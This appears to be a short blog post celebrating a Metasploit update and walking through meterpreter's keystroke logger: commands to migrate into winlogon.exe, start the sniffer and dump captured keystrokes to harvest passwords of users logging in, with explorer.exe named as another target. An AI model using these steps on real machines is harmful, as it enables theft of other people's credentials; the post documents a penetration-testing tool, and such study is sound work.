H.D. Moore continues to kick some major bum with some of his recent updates to the Metasploit Framework. Most notably is the keystroke logger addition to the meterpreter console. For those of you not aware of what meterpreter is, it’s a payload that gets delivered to the system somehow (i.e. buffer overflow, executable, etc.) and is really a swiss army knife for post-exploitation. With the latest svn update you can migrate to an already existing process like winlogon.exe and capture all keystrokes for individuals logging into a system. Pretty sweet stuff. I got to play with it this afternoon and its extremely simple, once in the meterpreter console do the following:
PID Name Path
— —- —-
401 winlogon.exe ??C:WINNTsystem32winlogon.exe
meterpreter> migrate 401
[*] Migrating to 401…
[*] Migration completed successfully.
Starting the keystroke sniffer…
**** A few minutes later after an admin logs in ****
meterpreter > keyscan_dump
Dumping captured keystrokes…
I.e. the ohnoes = password.
Of course this is’t just limited to the winlogon.exe, you can nail explorer.exe and intercept keystrokes from already logged in users.
More great stuff from the Metasploit framework, enjoy!